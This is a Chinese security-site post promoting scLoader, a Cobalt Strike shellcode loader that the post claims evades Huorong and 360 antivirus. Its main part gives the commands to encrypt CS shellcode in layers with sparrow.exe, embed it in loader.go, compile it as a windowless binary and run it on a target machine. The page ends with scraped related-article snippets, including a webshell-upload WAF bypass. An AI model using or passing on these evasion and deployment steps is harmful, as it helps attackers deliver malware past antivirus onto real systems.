CS shellcode 加载器 -- scLoader

VSole2022-12-27 10:20:25

一、工具介绍

目前测试了火绒和360,静态动态都能免杀,静态VT检测效果一般。

二、安装与使用

1、编译sparrow.go(不想编译直接go run也行)

找到项目中builder/sparrow.go文件,然后如图编译即可

2、使用sparrow.exe加密shellcode

在CS中生成需要格式的shellcode,将CS生成的原始.bin文件或.c文件放在sparrow.exe同一目录,使用命令

#.bin文件
.\sparrow.exe -e des,rc4,aes,3des,base64 -f .\payload.bin
#.c文件
.\sparrow.exe -e des,rc4,aes,3des,base64 -f .\payload.c

注意:-e参数必须使用base64编码结尾

3、将加密之后的shellcode填充到/loader/loader.go中的shellcode变量

4、将-e参数的值(加密顺序)填充到/loader/loader.go中的encodestr变量中

5、编译/loader/loader.go文件

go build -trimpath -ldflags="-w -s -H=windowsgui" ./loader/loader.go

6、上传到目标机器,使用loader.exe -token命令加载shellcode

三、下载地址:

项目地址:https://github.com/Peithon/scLoader

如有侵权,请联系删除

base64sparrow
本作品采用《CC 协议》,转载必须注明作者和本文链接
注意:-e参数必须使用base64编码结尾3、将加密之后的shellcode填充到/loader/loader.go中的shellcode变量4、将-e参数的值填充到/loader/loader.go中的encodestr变量中5、编译/loader/loader.go文件go build -trimpath -ldflags="-w -s -H=windowsgui" ./loader/loader.go
适用场景:使用burp作为代理,经过burp的数据包会自动进行base64编码。
多次测试后发现确实都相等,确定就是标准的Base64编码。发现与之前的111极为相似。
菜刀、冰蝎、蚁剑、哥斯拉的流量特征
[VNCTF2022]gocalc0复现
2022-05-07 16:02:38
看雪论坛作者ID:H3h3QAQ
Satacom下载程序,也称为LegionLoader,是2019年出现的一个著名的恶意软件家族。该恶意软件利用查询DNS服务器的技术获取base64编码的URL,以便接收当前由Satacom传播的另一恶意软件家族的下一阶段。
在渗透测试过程中,我们经常会遇到一些特殊的编码,如地址栏的URL编码,如抓包过程中遇到的Unicode编码、base64编码等。这款工具界面美观,使用稳定,相当好用。之前使用的小葵转码工具,一旦输错就会崩溃,相当淡疼。下面看下它的样子:可以看到它支持多种编码转换,前几个选项应用场景比较少,从base64往下的选项就比较常用了。
Decodify是一款功能强大的字符串安全处理工具,在该工具的帮助下,广大研究人员能够轻松地以递归的方式检测和解码编码字符串。假设现在有一个字符串“s0md3v”,然后使用Base64对其编码,结果如下:czBtZDN2. 解码凯撒密码我们可以使用--rot选项来提供偏移量,或者使用--rot all命令来告诉Decodify使用1-26偏移量来解码目标字符串。
前言前几天对自己学校进行的一次渗透测试,由于深信服过于变态,而且拦截会直接封ip,整个过程有点曲折期间进行了后缀名绕过,jspx命名空间绕过、获取网站根目录、base64五层编码写入shell等操作0x01 获取网站接口主界面:上传点:由于该应用是内嵌企业微信的套皮Html,所以我们首先用Burp Suite抓包获取接口和cookie任意文件上传:文件名强制命名为code+学号,后缀为最后一次点号出现之后的字母0x02 后缀名绕过代码不限制后缀名,但是waf限制呀!
VSole
网络安全专家